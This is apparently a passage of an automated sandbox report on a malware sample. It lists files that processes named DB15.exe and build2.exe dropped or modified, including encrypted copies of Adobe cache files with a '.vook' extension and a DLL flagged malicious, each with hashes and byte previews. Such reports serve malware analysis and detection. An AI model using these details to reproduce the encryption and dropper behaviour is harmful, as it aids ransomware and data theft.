                                                                                                                                                                                                                                      Preview:{"os_U.Vl.F)..J......[.....iQ.,sO...^...z..O..j.y.7..9.5(/Y..0..G..._...T..(.D.hR|..Z.gG."...N0`b......k..-...z=.s'.mKp=.Zs.(............d..Q..KNi.y...L1.I...y..=...m;..<$.M...G..=@.}.?Vd...U..W\6HuC....ks.6QvZ|~...Kyw&..<.b7......3.{E...G.).]|O..&.e4/...\.D.......9:......Y....].^.J]j..T.f..W.3=.g_....<..-.C...'...5!$.`../...........l@.r.c.{. ...8.....S.E....p{e2_.....9...hG..8D1.....7.~.z.:6.....F..U.%."9.(.....u}....B.f.......rA.....[@lYE.... [{....,.m..<1]...........!.U`...R..W.. 3..D;......C...4.L.......1....8..".`5.1D...1T...S W.....&..^......W.Jx#.~$.....6 ...w....6......z`...[../.....bF...P?UB.;.F...g>~.-..*...E.#..|.)^.yD..S..mT*(b...$.p....w.......7:k=tx..v.......9~C|.......~l..T.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):818
                                                                                                                                                                                                                                      Entropy (8bit):7.717424056579782
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:YKWWhVD3YYexszD7xPyC0rQehFSe7rycHBI/K8QKHy8XixpZacii9a:YKWOtPe2JP10rJLSe7rzhICYXiTkbD
                                                                                                                                                                                                                                      MD5:8A827C26345D04E393E35D21240577E1
                                                                                                                                                                                                                                      SHA1:362E2D6032902D1220684A6C9E755AED6A2453F1
                                                                                                                                                                                                                                      SHA-256:40C1A00277882391BA8964D9C508B49D87E58D82F3F5334C13D278CB1FD084ED
                                                                                                                                                                                                                                      SHA-512:DA9E8E7610551768FBF763068896AD32CCE0D9227A0F0E44B6DE5102B8C156F51640491B01FF18D095AE5885FB6010163C796CE6C0E9A0AB266D4B6771CADA67
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:{"os_U.Vl.F)..J......[.....iQ.,sO...^...z..O..j.y.7..9.5(/Y..0..G..._...T..(.D.hR|..Z.gG."...N0`b......k..-...z=.s'.mKp=.Zs.(............d..Q..KNi.y...L1.I...y..=...m;..<$.M...G..=@.}.?Vd...U..W\6HuC....ks.6QvZ|~...Kyw&..<.b7......3.{E...G.).]|O..&.e4/...\.D.......9:......Y....].^.J]j..T.f..W.3=.g_....<..-.C...'...5!$.`../...........l@.r.c.{. ...8.....S.E....p{e2_.....9...hG..8D1.....7.~.z.:6.....F..U.%."9.(.....u}....B.f.......rA.....[@lYE.... [{....,.m..<1]...........!.U`...R..W.. 3..D;......C...4.L.......1....8..".`5.1D...1T...S W.....&..^......W.Jx#.~$.....6 ...w....6......z`...[../.....bF...P?UB.;.F...g>~.-..*...E.#..|.)^.yD..S..mT*(b...$.p....w.......7:k=tx..v.......9~C|.......~l..T.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5297
                                                                                                                                                                                                                                      Entropy (8bit):7.96153327241918
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:g6sX7gmRthJgBKmyoeuQDPzfG2ZUWkQrlmDCLHt3axoHz/v:HsLgU2KChojXqNDMHdaWH
                                                                                                                                                                                                                                      MD5:6BC21452CE097499B493AA460813C6AF
                                                                                                                                                                                                                                      SHA1:E08E178D36FB0049EA5EFE2B3F8947879A24A50B
                                                                                                                                                                                                                                      SHA-256:0A07160F476584037E6E4E92D984BE97FCF63298F315298E21B7F5EC7150E259
                                                                                                                                                                                                                                      SHA-512:4D21812BE71F9B0EE55367CE329A40502A9A3752C3E088A2D0E2A6DA8497847568ECAE21ABBA48B4116B40A060B8444FA403DF5A1DF0DA9050F7BF474F9D3926
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:*...#[.z...@.n....z..G....]..f0.....P3.C....A.!.|x.~.........q..L..q.sA..N.......>X...........q./.p.*..L.5.s.P.]B_2.x......).4..........qTy..=y..zW.....gW._.c.u..H.),....!.._.'.-k1l.z\. 0EA._...oDS3.n.C..W......_.8Wa/F.J<.%..C~7..P.9_.....m..+.HD7........](.6I}.bg?<....W<..Z.cn...,.;.od....D]....=$~Z.......u..M..C{X#..N.Ac..v!....>.Y=..&..c.r..Z.V.....j2..S.J...b^.t=\....+.2..8...C..d..@.J..VBg$_..EDQUn.}.\.....M#.+..~^...?5E.._...B..#...s...s...8..C.e...>..]8.o~....VY........D..E..8.8. ...Ky3..}.G.-N.....j..+...";..b#~....!&....A..,s..u\.4.0k.H.K.}I....t.T.y.._...M+.....W.a...b.~......j..i....z..}......).u.X.M.KM.t#..DB..ZYj.0..-.....5.lW......J..De..YZ.U*...sW..O.].._....^.w..6an.O%.'.6....@..y7.q...q.O..Z.ilN.;.I6Z........M.~T+. \.c..gd.....Q...N,.q..dc....:7].|.....]o..-Nb.1K0t[.7.b....]~.......i.C.-..gGbT..v..#b.T ....I..@O.Ld.i.c.........fB.5.{#....l..F7\.#C.cS..#..nw...w...Z#..2NM.."0..)..`...P..fv..........ev.5$.x...p

                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5297
                                                                                                                                                                                                                                      Entropy (8bit):7.96153327241918
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:g6sX7gmRthJgBKmyoeuQDPzfG2ZUWkQrlmDCLHt3axoHz/v:HsLgU2KChojXqNDMHdaWH
                                                                                                                                                                                                                                      MD5:6BC21452CE097499B493AA460813C6AF
                                                                                                                                                                                                                                      SHA1:E08E178D36FB0049EA5EFE2B3F8947879A24A50B
                                                                                                                                                                                                                                      SHA-256:0A07160F476584037E6E4E92D984BE97FCF63298F315298E21B7F5EC7150E259
                                                                                                                                                                                                                                      SHA-512:4D21812BE71F9B0EE55367CE329A40502A9A3752C3E088A2D0E2A6DA8497847568ECAE21ABBA48B4116B40A060B8444FA403DF5A1DF0DA9050F7BF474F9D3926
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:*...#[.z...@.n....z..G....]..f0.....P3.C....A.!.|x.~.........q..L..q.sA..N.......>X...........q./.p.*..L.5.s.P.]B_2.x......).4..........qTy..=y..zW.....gW._.c.u..H.),....!.._.'.-k1l.z\. 0EA._...oDS3.n.C..W......_.8Wa/F.J<.%..C~7..P.9_.....m..+.HD7........](.6I}.bg?<....W<..Z.cn...,.;.od....D]....=$~Z.......u..M..C{X#..N.Ac..v!....>.Y=..&..c.r..Z.V.....j2..S.J...b^.t=\....+.2..8...C..d..@.J..VBg$_..EDQUn.}.\.....M#.+..~^...?5E.._...B..#...s...s...8..C.e...>..]8.o~....VY........D..E..8.8. ...Ky3..}.G.-N.....j..+...";..b#~....!&....A..,s..u\.4.0k.H.K.}I....t.T.y.._...M+.....W.a...b.~......j..i....z..}......).u.X.M.KM.t#..DB..ZYj.0..-.....5.lW......J..De..YZ.U*...sW..O.].._....^.w..6an.O%.'.6....@..y7.q...q.O..Z.ilN.;.I6Z........M.~T+. \.c..gd.....Q...N,.q..dc....:7].|.....]o..-Nb.1K0t[.7.b....]~.......i.C.-..gGbT..v..#b.T ....I..@O.Ld.i.c.........fB.5.{#....l..F7\.#C.cS..#..nw...w...Z#..2NM.."0..)..`...P..fv..........ev.5$.x...p

                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):661
                                                                                                                                                                                                                                      Entropy (8bit):7.664777702739969
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:kuvjeCFjrrKeo5F1MPk1fZdW/1gRaUJyI5t4UsLi4wEP+effCWfcxgrY/0ZixpZE:biCFjrrs5F1Ok1xdKPU75t4jwS+BHKsW
                                                                                                                                                                                                                                      MD5:4EDD0EB48E2C4B9AAC3FAF03B1F7420C
                                                                                                                                                                                                                                      SHA1:33AF9E585F3FDD4C7444A6A78D59807860377A9A
                                                                                                                                                                                                                                      SHA-256:4188C53AAFC6EAD2DA640F5786D2E4E135F917B759879DD4B1861B3B91C2D17E
                                                                                                                                                                                                                                      SHA-512:5A797964744E81046C7A1F571F3270802DDABBF139A80F88112953F70E02618181BFB6D32F241C7E9D66924E16374223CFBCFF201072EA927C6492A5FE0DC6E7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:2023/5........)S .....i7.Im.k.........P.m.O.p`....6..TjPl...[...\./.z.t.W/.]HZ...ju......#..).~1...2...Cx.....t.h..'......4.$]....X....C...P^....Z...].g.H_7@.....6.[^|.V.NZ.>.Y..K.`.[...).......;...j.h..<#.u.sV5..*..PQ0..j..F.....x\.z...p}lv..G..H!.|.I..Qi.."......}..r....>...n...q.n.{..o.@..>\$.p:.n.Y.gE.....<.z....V....x.f...."..._.'vS.....bB.q.f..@.Y1..n....J...W.w.(..$........./A<.6.B....p......k.h..).vct.'..6..r.8...cY/`.\.z...:...p.Vh......L_....l_..L.`l......-...SGt..N*_Y.{.E.A..X.....#.y.^...Z.....K....t...5...[...%.~I...R.@V.>/.Di:..E....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):661
                                                                                                                                                                                                                                      Entropy (8bit):7.664777702739969
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:kuvjeCFjrrKeo5F1MPk1fZdW/1gRaUJyI5t4UsLi4wEP+effCWfcxgrY/0ZixpZE:biCFjrrs5F1Ok1xdKPU75t4jwS+BHKsW
                                                                                                                                                                                                                                      MD5:4EDD0EB48E2C4B9AAC3FAF03B1F7420C
                                                                                                                                                                                                                                      SHA1:33AF9E585F3FDD4C7444A6A78D59807860377A9A
                                                                                                                                                                                                                                      SHA-256:4188C53AAFC6EAD2DA640F5786D2E4E135F917B759879DD4B1861B3B91C2D17E
                                                                                                                                                                                                                                      SHA-512:5A797964744E81046C7A1F571F3270802DDABBF139A80F88112953F70E02618181BFB6D32F241C7E9D66924E16374223CFBCFF201072EA927C6492A5FE0DC6E7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:2023/5........)S .....i7.Im.k.........P.m.O.p`....6..TjPl...[...\./.z.t.W/.]HZ...ju......#..).~1...2...Cx.....t.h..'......4.$]....X....C...P^....Z...].g.H_7@.....6.[^|.V.NZ.>.Y..K.`.[...).......;...j.h..<#.u.sV5..*..PQ0..j..F.....x\.z...p}lv..G..H!.|.I..Qi.."......}..r....>...n...q.n.{..o.@..>\$.p:.n.Y.gE.....<.z....V....x.f...."..._.'vS.....bB.q.f..@.Y1..n....J...W.w.(..$........./A<.6.B....p......k.h..).vct.'..6..r.8...cY/`.\.z...:...p.Vh......L_....l_..L.`l......-...SGt..N*_Y.{.E.A..X.....#.y.^...Z.....K....t...5...[...%.~I...R.@V.>/.Di:..E....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\000003.log

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):388
                                                                                                                                                                                                                                      Entropy (8bit):7.306386355493812
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:4HViIXbk+nc0WLdKpwdsVt9Hbmv72uAixpZacii9a:Oi4nWkpwWt9Hbe7CiTkbD
                                                                                                                                                                                                                                      MD5:DD3E6B4129B6B20995FAE8503FEF3009
                                                                                                                                                                                                                                      SHA1:12A41B613E30DF1162E536E9410BFBD67B62703C
                                                                                                                                                                                                                                      SHA-256:DA2E6BD70E9680CF9884D4D398384EBD0661ABCBF6FFBFD96FE2579C9BEEB22A
                                                                                                                                                                                                                                      SHA-512:605C247C016C96189FB6520F8CC96957FA0CAF53C29693B9ECA7E2B171436639035B09169F20A3282C201C9FD8988B3EC654F51F450722398B645664A0857E9F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:..../{C.,/.n....v.PnU.eq.V.....$..).:.y.:DZ....J!_KX].V..BG.......|.K..?.....*.....H./....{..W..8.cL.Vl...<....Qd.l..'.#.N..A..[.....r..2O.zBL.Y...B..v....C.L..;.B..v....f......nQ."@......1f.c.P..^.UOI....*.P...;..J.......?.KZ....I+.7...qD..=X.{...k.....(K.$DA..O.vZ..._09.d..M....b.4r...0.e..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\000003.log.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):388
                                                                                                                                                                                                                                      Entropy (8bit):7.306386355493812
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:4HViIXbk+nc0WLdKpwdsVt9Hbmv72uAixpZacii9a:Oi4nWkpwWt9Hbe7CiTkbD
                                                                                                                                                                                                                                      MD5:DD3E6B4129B6B20995FAE8503FEF3009
                                                                                                                                                                                                                                      SHA1:12A41B613E30DF1162E536E9410BFBD67B62703C
                                                                                                                                                                                                                                      SHA-256:DA2E6BD70E9680CF9884D4D398384EBD0661ABCBF6FFBFD96FE2579C9BEEB22A
                                                                                                                                                                                                                                      SHA-512:605C247C016C96189FB6520F8CC96957FA0CAF53C29693B9ECA7E2B171436639035B09169F20A3282C201C9FD8988B3EC654F51F450722398B645664A0857E9F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:..../{C.,/.n....v.PnU.eq.V.....$..).:.y.:DZ....J!_KX].V..BG.......|.K..?.....*.....H./....{..W..8.cL.Vl...<....Qd.l..'.#.N..A..[.....r..2O.zBL.Y...B..v....C.L..;.B..v....f......nQ."@......1f.c.P..^.UOI....*.P...;..J.......?.KZ....I+.7...qD..=X.{...k.....(K.$DA..O.vZ..._09.d..M....b.4r...0.e..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                      Size (bytes):460
                                                                                                                                                                                                                                      Entropy (8bit):7.481622735098049
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:Gh8kdaxAPVJTnEzfvHqC3E2JWoHfyfWixpZacii9a:GQ4VdEbBLWoHfyuiTkbD
                                                                                                                                                                                                                                      MD5:F466EA8D80E1E3E4A6C2AB8B8879491A
                                                                                                                                                                                                                                      SHA1:B54D6F30BFDA9BFEFF4E3302DC1771B095E735DD
                                                                                                                                                                                                                                      SHA-256:2872C6A2DF9663D1AA1C80DBA1E2FB867E2C9264D6A96AD5C1AE417BCA9456EE
                                                                                                                                                                                                                                      SHA-512:1455EBAD6C6C40AEE1FF72218C5CE6067B8F96802787F6EE84B1DFC677ADDB36C155DA7A06CD66FCD295B228CD34B605AF70A1261E974D07D0DD8688B4371DF6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:.h.6.p..I........zf.v..m.~....b.........msomg...P.@.+....21....... eT............Zo......y..\0.);*....0.y5'X\..z([.poN.VO....BFym].{.n.g.d`8.B....|.4.....\...j........Y.y(...c.9+../6.>..4..C....1k\.z..+...W4.~...O.G.._.......?.,.32......N......&..b1f..... ./yo..(.?...F..[.v...L.0..0..|.N.N.....t.... )..n.rg..N$..........xu...3m.#...U=...D.w....r...|.[...r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\000003.log.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):460
                                                                                                                                                                                                                                      Entropy (8bit):7.481622735098049
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:Gh8kdaxAPVJTnEzfvHqC3E2JWoHfyfWixpZacii9a:GQ4VdEbBLWoHfyuiTkbD
                                                                                                                                                                                                                                      MD5:F466EA8D80E1E3E4A6C2AB8B8879491A
                                                                                                                                                                                                                                      SHA1:B54D6F30BFDA9BFEFF4E3302DC1771B095E735DD
                                                                                                                                                                                                                                      SHA-256:2872C6A2DF9663D1AA1C80DBA1E2FB867E2C9264D6A96AD5C1AE417BCA9456EE
                                                                                                                                                                                                                                      SHA-512:1455EBAD6C6C40AEE1FF72218C5CE6067B8F96802787F6EE84B1DFC677ADDB36C155DA7A06CD66FCD295B228CD34B605AF70A1261E974D07D0DD8688B4371DF6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:.h.6.p..I........zf.v..m.~....b.........msomg...P.@.+....21....... eT............Zo......y..\0.);*....0.y5'X\..z([.poN.VO....BFym].{.n.g.d`8.B....|.4.....\...j........Y.y(...c.9+../6.>..4..C....1k\.z..+...W4.~...O.G.._.......?.,.32......N......&..b1f..... ./yo..(.?...F..[.v...L.0..0..|.N.N.....t.... )..n.rg..N$..........xu...3m.#...U=...D.w....r...|.[...r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001d.db

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):107504
                                                                                                                                                                                                                                      Entropy (8bit):3.9980638308424283
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:jY18qKkRGKgCMwjk0Yc/ImXkWgTNjLlFRjwHGpPhYDR1vICwh1/mOypZr3EoUhyO:jSKkPg8/ImXkLnGUh2i4GGnJrFnZKtG8
                                                                                                                                                                                                                                      MD5:191824B427B309E77F49F69A05CEC1B9
                                                                                                                                                                                                                                      SHA1:DAED5D5D0EDA142C042ECA92B0E1CACAE8113BAD
                                                                                                                                                                                                                                      SHA-256:33E5249A99D2C4B9DA5329AA15BA0CC43685D96B4B3261E4EB740D76D41271A9
                                                                                                                                                                                                                                      SHA-512:0EEC365340F8426C1B70B989952BFB04320EEFA8CA0F39063CCB241E72F3FFFED86353B5D9C0FA1FFCA081C954CDAF9FF21FCCDA45CC06492270E486423D51CF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:....h... ..............P...............X.......]...P..................V.......e.n.-.C.H.;.e.n.-.G.B...............p..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....Z.1...........user..B............................................e.n.g.i.n.e.e.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u................(..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....Z.1...........user..B.........................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001e.db

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):107504
                                                                                                                                                                                                                                      Entropy (8bit):3.9984776395627697
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:Ni18yKkvGKgCMwjk0Yc/ImXkWgTNjLlFRjwHGpPhYDR1vICwh1/mOypZr3EoUhyC:NcKkFg8/ImXkLnGUh2i4GGnJrFnZKtQu
                                                                                                                                                                                                                                      MD5:700BA69C848B80DB0851F653DCEE6C81
                                                                                                                                                                                                                                      SHA1:EA4B751D97535E35C7003D0964325BAA4C6BB900
                                                                                                                                                                                                                                      SHA-256:7898AC53DAF3D4A777FD08BC601A292DDC2C26FF7E692CC8EF7D8955A008960B
                                                                                                                                                                                                                                      SHA-512:DEB4C1FA71772C564A32E0890335DB6F19CF84A3A27AE2CD792115BF4776086980956495F9AA2145EE898AD00D23AF8D0A78BC0FC3C8DBA00ED7F45E11DDA493
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:....h... ..............P...............X.......]...P..................V.......e.n.-.C.H.;.e.n.-.G.B...............p..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....Z.1...........user..B............................................e.n.g.i.n.e.e.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u................(..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....Z.1...........user..B.........................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\Windows[4].json

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):619
                                                                                                                                                                                                                                      Entropy (8bit):5.12378228708153
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:YWgc2T76kFtH+H6kZkmXtH4aH+2yrZMAdrKCw8kEUq1HLxycXNNZW3c3Z:Yzc2T76kbHa6khGaHt0drtUET
                                                                                                                                                                                                                                      MD5:FBA6D7ACE8ABF28F64D7B903D39064A2
                                                                                                                                                                                                                                      SHA1:7AF1F487B7805171728BBFA2CA2E3D1A62280CD9
                                                                                                                                                                                                                                      SHA-256:AE08C8525198AB01F28B6D986F9F04478F8B57E76C68E35E1E9CECE7A48FCC0E
                                                                                                                                                                                                                                      SHA-512:D442DC08681720FCB2EECD0A95A3ED66A87F70C2FF8328F4AAB759977FDBA05C03F315680C449AD7EAF06A32F9CE460413B4E1B277837C93FD64E6147E105BA1
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:{"serviceContext":{"serviceActivityId":"6605a01c-9139-4086-b62e-c73ff0ae3200","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"6605a01c-9139-4086-b62e-c73ff0ae3200|2024-03-28T16:51:40.3945315Z|fabric_msn|ESU|News_319"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"webView2Enabled":false,"webView2EnabledV1":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false},"isPartial":false}

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqlm[1].dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2459136
                                                                                                                                                                                                                                      Entropy (8bit):6.052474106868353
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                                                                                                                                                                                      MD5:90E744829865D57082A7F452EDC90DE5
                                                                                                                                                                                                                                      SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                                                                                                                                                                                      SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                                                                                                                                                                                      SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199658817715[1].htm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3041), with CRLF, LF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):34657
                                                                                                                                                                                                                                      Entropy (8bit):5.43044162854336
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:k7pqLtWY2wt5D0gqxAiNGAhZ4VWBCW3KI8iCfukPco1AU2Z4VWBCW3KI8iKh2S2A:k78LtWY2wt5D0gqxAchZ4VWBCW3KI8ig
                                                                                                                                                                                                                                      MD5:2CE1110277136D55D58EC87EE88519FD
                                                                                                                                                                                                                                      SHA1:691ACDA074DBED6D4D9CBAA4C4EABF09F627ACC7
                                                                                                                                                                                                                                      SHA-256:4464119EEEC8E77F8656B985FFCF848F2B06A344B2A24BE799B22665F6E50A73
